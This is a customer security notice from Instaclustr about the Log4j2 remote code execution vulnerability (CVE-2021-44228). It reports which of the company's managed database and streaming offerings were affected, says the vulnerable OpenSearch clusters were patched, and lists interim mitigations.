An earlier version of this notice was sent to our customers on 10 December AEST/9 December UTC.
Last Friday (AEST) Instaclustr became aware of a vulnerability in the commonly used Apache Log4j2™ java logging library which potentially allows for remote code execution in applications which log attacker controlled input. Though this issue had not been assigned a CVE at the time, based on our estimation of CVSS scoring we ranked it as a critical vulnerability in any system in which it could be exploited. A CVE for the issue has since been issued: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Since the issue was uncovered, Instaclustr has been examining it in the context of our offerings to ensure the security of our customers’ data is maintained.
We have analyzed our Apache Cassandra®, Apache Kafka®, Kafka Connect®, Redis™, PostgreSQL®, Apache ZooKeeper®, and Cadence offerings as well as our own internal management systems and believe they are not affected, as they either do not use log4j-core or do not use the impacted version. We let our existing customers know on Friday, 10 December that the impact of this vulnerability for the vast majority of our customers was minimal.
We undertook a deeper investigation of OpenSearch and Open Distro for Elasticsearch to understand any potential impact on these offerings. We identified a small number of clusters that had the vulnerable library and all these clusters have been patched and upgraded.
Existing Java based systems within the Instaclustr control plane were also identified as not being vulnerable.
Whilst we believe all our existing systems and customer deployments are protected from these vulnerabilities additional mitigations in the interim are:
- Remove access to OpenSearch/opendistro clusters from the public internet where possible
- Use PCI-DSS compliance mode OpenSearch/opendistro clusters for sensitive data. This configuration provides additional layers of protection which greatly limit the possibility of exploiting the vulnerability as we currently understand it
- For our support customers, look at applying one of the mitigations listed here if patching immediately is not feasible: https://logging.apache.org/log4j/2.x/security.html
Should you have any questions regarding Instaclustr Security, please contact us by email [email protected].
To report an active security incident, email [email protected].